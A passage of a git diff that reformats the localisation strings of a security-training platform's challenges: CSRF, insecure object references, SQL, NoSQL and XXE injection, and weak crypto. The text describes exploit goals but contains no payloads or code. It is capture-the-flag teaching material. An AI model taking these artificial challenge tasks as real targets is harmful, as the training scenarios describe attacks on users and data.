-challenge.withTheseParameters=With the following parameters;
-challenge.inJson=With the request body (Formed in JSON);
-challenge.userIdExample=exampleId
-challenge.userTokenExample=exampleToken
-challenge.yourCsrfTokenCamelCase=yourCsrfToken
-challenge.csrfTokenGenerated=The csrfToken parameter is generated dynamically for each user upon user interaction with the request described above.
-challenge.getCsrfTokenHere.1=You can retrieve your CSRF token
-challenge.getCsrfTokenHere.2=here
-challenge.whereIdIsUserBeenIncremented.1=Where
-challenge.whereIdIsUserBeenIncremented.2=is the ID of the user who's CSRF counter is being incremented.
-challenge.yourIdIs=Your ID is:
-challenge.yourIdIs.1=Any user than you may increment your counter for this challenge, except you. Exploit the CSRF vulnerability in the request described above against other users to complete this challenge. Once you have successfully CSRF'd another Security Shepherd user, the solution key will appear just below this message.
-challenge.yourCsrfTokenIs=and your CSRF token is
-challenge.useForumForImg=You can use the CSRF forum below to post a message with an image.
-challenge.useForumForIframe=You can use the CSRF forum below to post a message with a HTML Page.
-challenge.firstUser.get=If You are the first person to get this far, then your going to have to force another player to submit the GET request some other way!
-challenge.firstUser.post=If You are the first person to get this far, then your going to have to force another player to submit the POST request some other way!
-result.congratsTheKeyIs=Congratulations, you have completed this CSRF challenge by successfully carrying out a CSRF attack on another user for this level's target. The result key is
-result.challengeCompleted=This CSRF Challenge has been Completed
-forum.img.whatToDo=Please enter the <a>image</a> that you would like to share with your class
-forum.iframe.whatToDo=Please enter the HTML page you would like to share with your class
-forum.postMessage=Post Message
-forum.loading=Loading...
-forum.userName=User Name
-forum.image=Image
-forum.message=Message
-error.occurred=An Error Occurred
-error.noClass=You must be assigned to a class to use this function. Please contact your administrator.
-error.noToken=Was unable to retrieve CSRF Token. Funky
-title.csrf1=Cross Site Request Forgery Challenge One
-title.csrf2=Cross Site Request Forgery Challenge Two
-title.csrf3=Cross Site Request Forgery Challenge Three
-title.csrf4=CSRF Challenge Four
-title.csrf5=CSRF Challenge Five
-title.csrf6=Cross Site Request Forgery Challenge Six
-title.csrf7=CSRF Challenge 7
-title.csrfJson=CSRF Challenge JSON
\ No newline at end of file
+challenge.intro = To complete this challenge, you must get your CSRF counter above 0. Once The request to increment your counter is as follows;
+challenge.withThisParameter = With the following parameter;
+challenge.withTheseParameters = With the following parameters;
+challenge.inJson = With the request body (Formed in JSON);
+challenge.userIdExample = exampleId
+challenge.userTokenExample = exampleToken
+challenge.yourCsrfTokenCamelCase = yourCsrfToken
+challenge.csrfTokenGenerated = The csrfToken parameter is generated dynamically for each user upon user interaction with the request described above.
+challenge.getCsrfTokenHere.1 = You can retrieve your CSRF token
+challenge.getCsrfTokenHere.2 = here
+challenge.whereIdIsUserBeenIncremented.1 = Where
+challenge.whereIdIsUserBeenIncremented.2 = is the ID of the user who's CSRF counter is being incremented.
+challenge.yourIdIs = Your ID is:
+challenge.yourIdIs.1 = Any user than you may increment your counter for this challenge, except you. Exploit the CSRF vulnerability in the request described above against other users to complete this challenge. Once you have successfully CSRF'd another Security Shepherd user, the solution key will appear just below this message.
+challenge.yourCsrfTokenIs = and your CSRF token is
+challenge.useForumForImg = You can use the CSRF forum below to post a message with an image.
+challenge.useForumForIframe = You can use the CSRF forum below to post a message with a HTML Page.
+challenge.firstUser.get = If You are the first person to get this far, then your going to have to force another player to submit the GET request some other way!
+challenge.firstUser.post = If You are the first person to get this far, then your going to have to force another player to submit the POST request some other way!
+
+result.congratsTheKeyIs = Congratulations, you have completed this CSRF challenge by successfully carrying out a CSRF attack on another user for this level's target. The result key is
+result.challengeCompleted = This CSRF Challenge has been Completed
+
+forum.img.whatToDo = Please enter the <a>image</a> that you would like to share with your class
+forum.iframe.whatToDo = Please enter the HTML page you would like to share with your class
+forum.postMessage = Post Message
+forum.loading = Loading...
+forum.userName = User Name
+forum.image = Image
+forum.message = Message
+
+error.occurred = An Error Occurred
+error.noClass = You must be assigned to a class to use this function. Please contact your administrator.
+error.noToken = Was unable to retrieve CSRF Token. Funky
+
+
+title.csrf1 = Cross Site Request Forgery Challenge One
+title.csrf2 = Cross Site Request Forgery Challenge Two
+title.csrf3 = Cross Site Request Forgery Challenge Three
+title.csrf4 = CSRF Challenge Four
+title.csrf5 = CSRF Challenge Five
+title.csrf6 = Cross Site Request Forgery Challenge Six
+title.csrf7 = CSRF Challenge 7
+title.csrfJson = CSRF Challenge JSON
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties b/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties
index fc714719f..ff8ecf4e7 100644
--- a/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties
+++ b/src/main/resources/i18n/challenges/directObject/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.properties
@@ -1,14 +1,19 @@
-challenge.challengeName=Insecure Direct Object References Challenge Two
-challenge.whatToDo=To complete this challenge you must sign in to a bank account that has more than 5000000 euro in it. If you have more than this amount in your account, just sign out and back in again of the bank account to get the key, or open this level again.
-insecureBank.title=InsecureDirectBank
-insecureBank.message=Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
-insecureBank.signInNow=Sign in Now!
-insecureBank.signInNow.message=Use this form to sign into your account now!
-loginForm.holder=Account Holder:
-loginForm.password=Account Password:
-loginForm.signIn=Sign Into Bank Account
-form.loading=Loading...
-register.makeAccount=Register An Account!
-register.makeAccount.message=Use this form to register an account now!
-register.createAccount=Create Bank Account
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Insecure Direct Object References Challenge Two
+challenge.whatToDo = To complete this challenge you must sign in to a bank account that has more than 5000000 euro in it. If you have more than this amount in your account, just sign out and back in again of the bank account to get the key, or open this level again.
+
+insecureBank.title = InsecureDirectBank
+insecureBank.message = Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
+insecureBank.signInNow = Sign in Now!
+insecureBank.signInNow.message = Use this form to sign into your account now!
+
+loginForm.holder = Account Holder:
+loginForm.password = Account Password:
+loginForm.signIn = Sign Into Bank Account
+
+form.loading = Loading...
+
+register.makeAccount = Register An Account!
+register.makeAccount.message = Use this form to register an account now!
+register.createAccount = Create Bank Account
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties b/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties
index 71795d15a..2bf692b82 100644
--- a/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties
+++ b/src/main/resources/i18n/challenges/directObject/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.properties
@@ -1,4 +1,4 @@
-challenge.challengeName=Insecure Direct Object References Challenge One
-challenge.whatToDo=The result key for this challenge is stored in the private message for a user that is not listed below...
-challenge.showProfile=Show this Profile
-challenge.loading=Loading...
\ No newline at end of file
+challenge.challengeName = Insecure Direct Object References Challenge One
+challenge.whatToDo = The result key for this challenge is stored in the private message for a user that is not listed below...
+challenge.showProfile = Show this Profile
+challenge.loading = Loading...
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties b/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties
index 2a273ddf0..9e3347fee 100644
--- a/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties
+++ b/src/main/resources/i18n/challenges/directObject/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.properties
@@ -1,4 +1,4 @@
-challenge.challengeName=Insecure Direct Object References Challenge Two
-challenge.whatToDo=The result key for this challenge is stored in the private message for a user that is not listed below...
-challenge.showProfile=Show this Profile
-challenge.loading=Loading...
\ No newline at end of file
+challenge.challengeName = Insecure Direct Object References Challenge Two
+challenge.whatToDo = The result key for this challenge is stored in the private message for a user that is not listed below...
+challenge.showProfile = Show this Profile
+challenge.loading = Loading...
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties b/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties
index b665b1529..813f764d2 100644
--- a/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties
+++ b/src/main/resources/i18n/challenges/injection/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.properties
@@ -1,8 +1,8 @@
-challenge.challengeName=SQL Injection 4
-challenge.description=To acquire the result key for this challenge you must successfully sign in as an administrator.
-challenge.superSecurePayments=Super Secure Payments
-challenge.form.instruction=Please sign in to make your very secure payments.
-challenge.form.userName=UserName:
-challenge.form.password=Password:
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection 4
+challenge.description = To acquire the result key for this challenge you must successfully sign in as an administrator.
+challenge.superSecurePayments = Super Secure Payments
+challenge.form.instruction = Please sign in to make your very secure payments.
+challenge.form.userName = UserName:
+challenge.form.password = Password:
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties b/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties
index b0ca274f4..863cf44f1 100644
--- a/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties
+++ b/src/main/resources/i18n/challenges/injection/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.properties
@@ -1,11 +1,11 @@
-challenge.challengeName=SQL Injection Stored Procedure Challenge
-challenge.description=To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are attempting to inject code into!
-challenge.form.pleaseEnter=Please enter the 
-challenge.form.customerName=Customer Name
-challenge.form.userLookUp=of the user that you want to look up
-challenge.form.getUser=Get this user
-sign.hint=Would you like a hint?
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Stored Procedure Challenge
+challenge.description = To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are attempting to inject code into!
+challenge.form.pleaseEnter = Please enter the 
+challenge.form.customerName = Customer Name
+challenge.form.userLookUp =  of the user that you want to look up
+challenge.form.getUser = Get this user
+sign.hint = Would you like a hint?
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties b/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties
index 16d95ded6..5df5ddfd6 100644
--- a/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties
+++ b/src/main/resources/i18n/challenges/injection/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.properties
@@ -1,8 +1,8 @@
-challenge.challengeName=SQL Injection Challenge 7
-challenge.description=To complete this challenge, you must exploit a SQL injection flaw so you can sign in and receive the result key.
-challenge.form.pleaseEnterCredentials=Please enter your email and password to sign in.
-challenge.form.email=Email:
-challenge.form.password=Password:
-challenge.form.button.value=Sign In
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge 7
+challenge.description = To complete this challenge, you must exploit a SQL injection flaw so you can sign in and receive the result key.
+challenge.form.pleaseEnterCredentials = Please enter your email and password to sign in.
+challenge.form.email = Email:
+challenge.form.password = Password:
+challenge.form.button.value = Sign In
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties b/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties
index 73a8c43d5..4f287a2ca 100644
--- a/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties
+++ b/src/main/resources/i18n/challenges/injection/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Escaping Challenge
-challenge.description=To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key. The developer of this level has attempted to stop SQL Injection attacks by escaping apostrophes so the database interpreter will know not to pay attention to user submitted apostrophes.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are injecting code into! Be aware that your apostrophes are being escaped with a leading backslash before being sent to the interpreter.
-challenge.form.pleaseEnter=Please enter the <a>Customer Id</a> of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Escaping Challenge
+challenge.description = To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key. The developer of this level has attempted to stop SQL Injection attacks by escaping apostrophes so the database interpreter will know not to pay attention to user submitted apostrophes.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are injecting code into! Be aware that your apostrophes are being escaped with a leading backslash before being sent to the interpreter.
+challenge.form.pleaseEnter = Please enter the <a>Customer Id</a> of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties b/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties
index ca6b7c02c..c42c09bd9 100644
--- a/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties
+++ b/src/main/resources/i18n/challenges/injection/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.properties
@@ -1,17 +1,17 @@
-challenge.challengeName=SQL Injection Challenge 5
-challenge.description=If you can buy oranges for free you'll receive the key for this level! 
-challenge.description.h3=Almost-Not a Juice Shop
-challenge.description.p1=Hey customers: Due to a shipping mistake we are completely over stocked in fruit
-challenge.description.p2=Use the coupon code <a>PleaseTakeAFruit</a> or <a>FruitForFree</a> to get yours for free!!!.
-challenge.form.picture=Picture
-challenge.form.cost=Cost
-challenge.form.quantity=Quantity
-challenge.form.45=$45
-challenge.form.15=$15
-challenge.form.3000=$3000
-challenge.form.30=$30
-challenge.form.pleaseSelect=Please select how many things you would like to buy and click submit
-challenge.form.couponCode=Coupon Code
-challenge.form.button.value=Place Order
-sign.loading=Loading
-error.occurred=An Error Occurred
+challenge.challengeName = SQL Injection Challenge 5
+challenge.description = If you can buy oranges for free you'll receive the key for this level! 
+challenge.description.h3 = Almost-Not a Juice Shop
+challenge.description.p1 = Hey customers: Due to a shipping mistake we are completely over stocked in fruit
+challenge.description.p2 = Use the coupon code <a>PleaseTakeAFruit</a> or <a>FruitForFree</a> to get yours for free!!!.
+challenge.form.picture = Picture
+challenge.form.cost = Cost
+challenge.form.quantity = Quantity
+challenge.form.45 = $45
+challenge.form.15 = $15
+challenge.form.3000 = $3000
+challenge.form.30 = $30
+challenge.form.pleaseSelect = Please select how many things you would like to buy and click submit
+challenge.form.couponCode = Coupon Code
+challenge.form.button.value = Place Order
+sign.loading = Loading
+error.occurred = An Error Occurred
diff --git a/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties b/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties
index 71c85d7fe..b5eeb9966 100644
--- a/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties
+++ b/src/main/resources/i18n/challenges/injection/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e.properties
@@ -1,7 +1,7 @@
-challenge.challengeName=XXE Injection 1
-challenge.description=To complete this challenge you must read the contents JSON's file 
-paragraph.info.emailAdd=Please enter your <a>email</a> to reset the password
-sign.loading=Loading
-error.occurred=An Error Occurred
-button.resetPassword=Reset My Password
-word.info.loading=Loading...
+challenge.challengeName = XXE Injection 1
+challenge.description =  To complete this challenge you must read the contents JSON's file 
+paragraph.info.emailAdd = Please enter your <a>email</a> to reset the password
+sign.loading = Loading
+error.occurred = An Error Occurred
+button.resetPassword = Reset My Password
+word.info.loading = Loading...
diff --git a/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties b/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties
index 3ee5479bc..d627e3967 100644
--- a/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties
+++ b/src/main/resources/i18n/challenges/injection/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6.properties
@@ -1,6 +1,6 @@
-challenge.challengeName=SQL Injection Challenge Three
-challenge.description=To complete this challenge, you must exploit a SQL injection issue in the following sub application to acquire the <a>credit card number</a> from one of the <a>customers</a> that has a <a>customer name</a> of <a>Mary Martin</a>. Mary's credit card number is the result key to this challenge.
-challenge.form.pleaseEnter=Please enter the <a>Customer Name</a> of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge Three
+challenge.description = To complete this challenge, you must exploit a SQL injection issue in the following sub application to acquire the <a>credit card number</a> from one of the <a>customers</a> that has a <a>customer name</a> of <a>Mary Martin</a>. Mary's credit card number is the result key to this challenge.
+challenge.form.pleaseEnter = Please enter the <a>Customer Name</a> of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties b/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties
index 90ebb51ae..2420a6808 100644
--- a/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties
+++ b/src/main/resources/i18n/challenges/injection/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Challenge 6
-challenge.description=To obtain the result key to this challenge, you must obtain <em>Brendan's</em> answer to his security question.
-challenge.description.h3=Get Your Authentication Number
-challenge.description.p=Put in your pin number to get your current authentication number
-challenge.form.pinNumber=Please enter your Pin number: 
-challenge.form.button.value=Run User Query
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge 6
+challenge.description = To obtain the result key to this challenge, you must obtain <em>Brendan's</em> answer to his security question.
+challenge.description.h3 = Get Your Authentication Number
+challenge.description.p = Put in your pin number to get your current authentication number
+challenge.form.pinNumber = Please enter your Pin number: 
+challenge.form.button.value = Run User Query
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties b/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties
index 45635eb70..105ae47fe 100644
--- a/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties
+++ b/src/main/resources/i18n/challenges/injection/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.properties
@@ -1,5 +1,7 @@
-challenge.challengeName=NoSQL Injection Challenge One
-challenge.description=<p style='font-size:13px'>You need to exploit a NoSQL injection vulnerability to retrieve Marlo's GamerID</p>
-challenge.para2=Hey Jimmy, press the button to get your <em>Gamer</em> details
-sign.loading=Loading...
-error.occurred=An Error Occurred 
\ No newline at end of file
+challenge.challengeName = NoSQL Injection Challenge One
+challenge.description = <p style='font-size:13px'>You need to exploit a NoSQL injection vulnerability to retrieve Marlo's GamerID</p>
+challenge.para2 = Hey Jimmy, press the button to get your <em>Gamer</em> details
+
+sign.loading = Loading...
+
+error.occurred = An Error Occurred 
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties b/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties
index 65c3a6776..548019698 100644
--- a/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties
+++ b/src/main/resources/i18n/challenges/injection/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Challenge One
-challenge.description=To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are injecting code into! Take special note of characters that start and stop the context of a String
-challenge.form.pleaseEnter=Please enter the <a>Customer Id</a> of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge One
+challenge.description = To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are injecting code into! Take special note of characters that start and stop the context of a String
+challenge.form.pleaseEnter = Please enter the <a>Customer Id</a> of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties b/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties
index 5d62dc358..69e63ce71 100644
--- a/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties
+++ b/src/main/resources/i18n/challenges/injection/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b.properties
@@ -1,9 +1,9 @@
-challenge.challengeName=SQL Injection Challenge Two
-challenge.description=To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
-challenge.hint=Challenge Hint
-challenge.hint.description=This is the query you are attempting to inject code into... But your input is been validated by the server before being sent to the interpreter!
-challenge.form.pleaseEnter=Please enter the <a>Customer Email</a> of the user that you want to look up
-challenge.form.button.value=Get user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = SQL Injection Challenge Two
+challenge.description = To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
+challenge.hint = Challenge Hint
+challenge.hint.description = This is the query you are attempting to inject code into... But your input is been validated by the server before being sent to the interpreter!
+challenge.form.pleaseEnter = Please enter the <a>Customer Email</a> of the user that you want to look up
+challenge.form.button.value = Get user
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties
index b8255a2a9..4bcfaf934 100644
--- a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties
+++ b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoHomeMade.properties
@@ -1,14 +1,19 @@
-challenge.challengeName=Insecure Cryptographic Storage Home Made Keys
-challenge.whatToDo=A developer was writing an education platform and wanted to implement solutions keys that were specific to each user to prevent answer sharing and cheating. To do so they take a base answer key salted with a random salt and encrypt it with AES using a random encryption key. The encryption key is combined with a user specific key that is based of the user's user name. To complete this challenge you will have to break this algorithm to create your own user specific solution (based on your Security Shepherd user name) for the last item in the table below. Use the information in the other rows of the table to break the algorithm locally. If you attempt to brute force this challenges submit function you will be locked out after 5 failed attempts and you will not be able solve the challenge at all.  
-badCrypto.title=Home Made Keys
-badCrypto.message=Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
-badCrypto.signInNow=Sign in Now!
-badCrypto.signInNow.message=Use this form to sign into your account now!
-loginForm.holder=Account Holder:
-loginForm.password=Account Password:
-loginForm.signIn=Sign Into Bank Account
-form.loading=Loading...
-register.makeAccount=Register An Account!
-register.makeAccount.message=Use this form to register an account now!
-register.createAccount=Create Bank Account
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Insecure Cryptographic Storage Home Made Keys
+challenge.whatToDo = A developer was writing an education platform and wanted to implement solutions keys that were specific to each user to prevent answer sharing and cheating. To do so they take a base answer key salted with a random salt and encrypt it with AES using a random encryption key. The encryption key is combined with a user specific key that is based of the user's user name. To complete this challenge you will have to break this algorithm to create your own user specific solution (based on your Security Shepherd user name) for the last item in the table below. Use the information in the other rows of the table to break the algorithm locally. If you attempt to brute force this challenges submit function you will be locked out after 5 failed attempts and you will not be able solve the challenge at all.  
+
+badCrypto.title = Home Made Keys
+badCrypto.message = Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
+badCrypto.signInNow = Sign in Now!
+badCrypto.signInNow.message = Use this form to sign into your account now!
+
+loginForm.holder = Account Holder:
+loginForm.password = Account Password:
+loginForm.signIn = Sign Into Bank Account
+
+form.loading = Loading...
+
+register.makeAccount = Register An Account!
+register.makeAccount.message = Use this form to register an account now!
+register.createAccount = Create Bank Account
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
index ae843bbd0..c73378d45 100644
--- a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
+++ b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
@@ -1,31 +1,36 @@
-insecureCryptoStorage.1.challengename=Insecure Cryptographic Storage Challenge 1
-insecureCryptoStorage.2.challengename=Insecure Cryptographic Storage Challenge 2
-insecureCryptoStorage.3.challengename=Insecure Cryptographic Storage Challenge 3
-insecureCryptoStorage.4.challengename=Insecure Crypto Storage Challenge 4
-insecureCryptoStorage.1.whatToDo=The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. However, the result key has been encrypted with a famous, but easily broken, Roman cipher. The Plain text is in English.
-insecureCryptoStorage.2.whatToDo=The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. The following form can be used to check if you have the correct result key.
-insecureCryptoStorage.2.checkKey=Check Result Key
-insecureCryptoStorage.2.hint=2D Encryption
-insecureCryptoStorage.2.commentedCode.1=Validate theKey:
-insecureCryptoStorage.2.commentedCode.2=Transform input:
-insecureCryptoStorage.2.commentedCode.3=Check result for validity
-insecureCryptoStorage.2.commentedCode.4=Output the "output" variable to the HTML for viewing
-insecureCryptoStorage.3.whatToDo=The result key to this level is the same as the encryption key used in the following sub application. Break the cipher and recover the encryption key! The result key is in all capital letters and is in English.
-insecureCryptoStorage.3.ciphertextToDecrypt=Cipher text to decrypt:
-insecureCryptoStorage.3.ciphertextExample=Cipher text Example
-insecureCryptoStorage.3.tryDecryptThis=Try to decrypt this:
-insecureCryptoStorage.4.whatToDo=If you can buy oranges for free you'll receive the key for this level!
-insecureCryptoStorage.4.shop=Super Fruit Shopping
-insecureCryptoStorage.4.shop.message.1=Hey customers: Due to a shipping mistake we are completely over stocked fruit. Use the coupon code
-insecureCryptoStorage.4.shop.message.2=or
-insecureCryptoStorage.4.shop.message.3=to get yours for free!!!
-insecureCryptoStorage.4.shop.picture=Picture
-insecureCryptoStorage.4.shop.cost=Cost
-insecureCryptoStorage.4.shop.quantity=Quantity
-insecureCryptoStorage.4.shop.howToShop=Please select how many things you would like to buy and click submit
